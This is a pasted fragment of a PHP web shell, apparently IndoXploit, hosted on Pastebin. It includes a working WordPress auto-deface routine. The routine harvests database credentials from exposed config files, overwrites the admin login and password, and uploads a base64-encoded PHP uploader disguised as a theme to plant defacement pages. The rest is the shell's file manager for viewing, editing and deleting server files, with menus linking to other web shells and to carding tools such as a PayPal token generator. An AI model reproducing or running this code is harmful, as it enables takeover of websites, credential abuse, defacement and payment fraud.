  3817.         function anucurl($sites) {
  3818.             $ch = curl_init($sites);
  3819.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3820.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3821.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3822.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3823.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3824.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3825.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3826.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3827.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3828.             $data = curl_exec($ch);
  3829.                   curl_close($ch);
  3830.             return $data;
  3831.         }
  3832.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3833.             $post = array(
  3834.                    "log" => "$userr",
  3835.                    "pwd" => "$pass",
  3836.                    "rememberme" => "forever",
  3837.                    "wp-submit" => "$wp_submit",
  3838.                    "redirect_to" => "$web",
  3839.                    "testcookie" => "1",
  3840.                    );
  3841.             $ch = curl_init($cek);
  3842.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3843.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3844.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3845.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3846.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3847.                   curl_setopt($ch, CURLOPT_POST, 1);
  3848.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3849.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3850.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3851.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3852.             $data = curl_exec($ch);
  3853.                   curl_close($ch);
  3854.             return $data;
  3855.         }
  3856.         $link = explode("\r\n", $_POST['link']);
  3857.         $script = htmlspecialchars($_POST['script']);
  3858.         $user = "indoxploit";
  3859.         $pass = "indoxploit";
  3860.         $passx = md5($pass);
  3861.         foreach($link as $dir_config) {
  3862.             $config = anucurl($dir_config);
  3863.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3864.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3865.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3866.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3867.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3868.             $prefix = $dbprefix."users";
  3869.             $option = $dbprefix."options";
  3870.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3871.             $db = mysql_select_db($dbname);
  3872.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3873.             $result = mysql_fetch_array($q);
  3874.             $id = $result[ID];
  3875.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3876.             $result2 = mysql_fetch_array($q2);
  3877.             $target = $result2[option_value];
  3878.             if($target == '') {                
  3879.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3880.             } else {
  3881.                 echo "[+] $target <br>";
  3882.             }
  3883.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3884.             if(!$conn OR !$db OR !$update) {
  3885.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3886.                 mysql_close($conn);
  3887.             } else {
  3888.                 $site = "$target/wp-login.php";
  3889.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3890.                 $b1 = anucurl($site2);
  3891.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3892.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3893.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3894.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3895.                 $www = "m.php";
  3896.                 $fp5 = fopen($www,"w");
  3897.                 fputs($fp5,$upload3);
  3898.                 $post2 = array(
  3899.                         "_wpnonce" => "$anu2",
  3900.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3901.                         "themezip" => "@$www",
  3902.                         "install-theme-submit" => "Install Now",
  3903.                         );
  3904.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3905.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3906.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3907.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3908.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3909.                       curl_setopt($ch, CURLOPT_POST, 1);
  3910.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3911.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3912.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3913.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3914.                 $data3 = curl_exec($ch);
  3915.                       curl_close($ch);
  3916.                 $y = date("Y");
  3917.                 $m = date("m");
  3918.                 $namafile = "id.php";
  3919.                 $fpi = fopen($namafile,"w");
  3920.                 fputs($fpi,$script);
  3921.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3922.                        curl_setopt($ch6, CURLOPT_POST, true);
  3923.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3924.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3925.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3926.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3927.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3928.                 $postResult = curl_exec($ch6);
  3929.                        curl_close($ch6);
  3930.                 $as = "$target/k.php";
  3931.                 $bs = anucurl($as);
  3932.                 if(preg_match("#$script#is", $bs)) {
  3933.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3934.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3935.                     } else {
  3936.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  3937.                     echo "[!!] coba aja manual: <br>";
  3938.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3939.                     echo "[+] username: <font color=lime>$user</font><br>";
  3940.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3941.                     }
  3942.                 mysql_close($conn);
  3943.             }
  3944.         }
  3945.     } else {
  3946.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  3947.         <form method='post'>
  3948.         Link Config: <br>
  3949.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3950.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
  3951.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3952.         </form></center>";
  3953.     }
  3954. } elseif($_GET['act'] == 'newfile') {
  3955.     if($_POST['new_save_file']) {
  3956.         $newfile = htmlspecialchars($_POST['newfile']);
  3957.         $fopen = fopen($newfile, "a+");
  3958.         if($fopen) {
  3959.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  3960.         } else {
  3961.             $act = "<font color=red>permission denied</font>";
  3962.         }
  3963.     }
  3964.     echo $act;
  3965.     echo "<form method='post'>
  3966.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  3967.     <input type='submit' name='new_save_file' value='Submit'>
  3968.     </form>";
  3969. } elseif($_GET['act'] == 'newfolder') {
  3970.     if($_POST['new_save_folder']) {
  3971.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3972.         if(!mkdir($new_folder)) {
  3973.             $act = "<font color=red>permission denied</font>";
  3974.         } else {
  3975.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3976.         }
  3977.     }
  3978.     echo $act;
  3979.     echo "<form method='post'>
  3980.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3981.     <input type='submit' name='new_save_folder' value='Submit'>
  3982.     </form>";
  3983. } elseif($_GET['act'] == 'rename_dir') {
  3984.     if($_POST['dir_rename']) {
  3985.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3986.         if($dir_rename) {
  3987.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3988.         } else {
  3989.             $act = "<font color=red>permission denied</font>";
  3990.         }
  3991.     echo "".$act."<br>";
  3992.     }
  3993.     echo "<form method='post'>
  3994.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  3995.     <input type='submit' name='dir_rename' value='rename'>
  3996.     </form>";
  3997. } elseif($_GET['act'] == 'delete_dir') {
  3998.     function Delete($path)
  3999. {
  4000.     if (is_dir($path) === true)
  4001.     {
  4002.         $files = array_diff(scandir($path), array('.', '..'));
  4003.         foreach ($files as $file)
  4004.         {
  4005.             Delete(realpath($path) . '/' . $file);
  4006.         }
  4007.         return rmdir($path);
  4008.     }
  4009.     else if (is_file($path) === true)
  4010.     {
  4011.         return unlink($path);
  4012.     }
  4013.     return false;
  4014. }
  4015.     $delete_dir = Delete($dir);
  4016.     if($delete_dir) {
  4017.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4018.     } else {
  4019.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4020.     }
  4021.     echo $act;
  4022. } elseif($_GET['act'] == 'view') {
  4023.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4024.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4025. } elseif($_GET['act'] == 'edit') {
  4026.     if($_POST['save']) {
  4027.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4028.         if($save) {
  4029.             $act = "<font color=lime>Saved!</font>";
  4030.         } else {
  4031.             $act = "<font color=red>permission denied</font>";
  4032.         }
  4033.     echo "".$act."<br>";
  4034.     }
  4035.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4036.     echo "<form method='post'>
  4037.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4038.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  4039.     </form>";
  4040. } elseif($_GET['act'] == 'rename') {
  4041.     if($_POST['do_rename']) {
  4042.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4043.         if($rename) {
  4044.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4045.         } else {
  4046.             $act = "<font color=red>permission denied</font>";
  4047.         }
  4048.     echo "".$act."<br>";
  4049.     }
  4050.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4051.     echo "<form method='post'>
  4052.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4053.     <input type='submit' name='do_rename' value='rename'>
  4054.     </form>";
  4055. } elseif($_GET['act'] == 'delete') {
  4056.     $delete = unlink($_GET['file']);
  4057.     if($delete) {
  4058.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4059.     } else {
  4060.         $act = "<font color=red>permission denied</font>";
  4061.     }
  4062.     echo $act;
  4063. }else {
  4064.     if(is_dir($dir) == true) {
  4065.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4066.         <tr>
  4067.         <th class="th_home"><center>Name</center></th>
  4068.         <th class="th_home"><center>Type</center></th>
  4069.         <th class="th_home"><center>Size</center></th>
  4070.         <th class="th_home"><center>Last Modified</center></th>
  4071.         <th class="th_home"><center>Permission</center></th>
  4072.         <th class="th_home"><center>Action</center></th>
  4073.         </tr>';
  4074.         $scandir = scandir($dir);
  4075.         foreach($scandir as $dirx) {
  4076.             $dtype = filetype("$dir/$dirx");
  4077.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4078.             if(!is_dir("$dir/$dirx")) continue;
  4079.             if($dirx === '..') {
  4080.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4081.             } elseif($dirx === '.') {
  4082.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4083.             } else {
  4084.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4085.             }
  4086.             if($dirx === '.' || $dirx === '..') {
  4087.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4088.                 } else {
  4089.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4090.             }
  4091.             echo "<tr>";
  4092.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4093.             echo "<td class='td_home'><center>$dtype</center></td>";
  4094.             echo "<td class='td_home'><center>-</center></th>";
  4095.             echo "<td class='td_home'><center>$dtime</center></td>";
  4096.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4097.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4098.         }
  4099.         echo "</tr>";
  4100.         foreach($scandir as $file) {
  4101.             $ftype = filetype("$dir/$file");
  4102.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4103.             $size = filesize("$dir/$file")/1024;
  4104.             $size = round($size,3);
  4105.             if($size > 1024) {
  4106.                 $size = round($size/1024,2). 'MB';
  4107.             } else {
  4108.                 $size = $size. 'KB';
  4109.             }
  4110.             if(!is_file("$dir/$file")) continue;
  4111.             echo "<tr>";
  4112.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4113.             echo "<td class='td_home'><center>$ftype</center></td>";
  4114.             echo "<td class='td_home'><center>$size</center></td>";
  4115.             echo "<td class='td_home'><center>$ftime</center></td>";
  4116.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4117.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4118.         }
  4119.         echo "</tr></table>";
  4120.     } else {
  4121.         echo "<font color=red>can't open directory</font>";
  4122.     }
  4123.     }
  4124. echo "<center><hr><form>
  4125. <select onchange='if (this.value) window.open(this.value);'>
  4126.    <option selected='selected' value=''> Tools Creator </option>
  4127.    <option value='$ling=wso'>WSO 2.8.1</option>
  4128.    <option value='$ling=injection'>1n73ction v3</option>
  4129.    <option value='$ling=wk'>WHMCS Killer</option>
  4130.    <option value='$ling=adminer'>Adminer</option>
  4131.    <option value='$ling=b374k'>b374k Shell</option>
  4132.    <option value='$ling=b374k323'>b374k 3.2</option>  
  4133.    <option value='$ling=bh'>BlackHat Shell</option>      
  4134.    <option value='$ling=dhanus'>Dhanush Shell</option>    
  4135.    <option value='$ling=r57'>R57 Shell</option>    
  4136. <option value='$ling=encodedecode'>Encode Decode</option>    
  4137. <option value='$ling=r57'>R57 Shell</option>    
  4138. </select>
  4139. <select onchange='if (this.value) window.open(this.value);'>
  4140.    <option selected='selected' value=''> Tools Carder </option>
  4141.    <option value='$ling=extractor'>DB Email Extractor</option>
  4142.    <option value='$ling=promailerv2'>Pro Mailer V2</option>    
  4143.    <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  4144.    <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  4145.    <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  4146.    <option value='$ling=mailer'>Mailer</option>  
  4147.    <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4148.    </select>
  4149. <noscript><input type='submit' value='Submit'></noscript>
  4150. ";
  4151. ?>
  4152. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top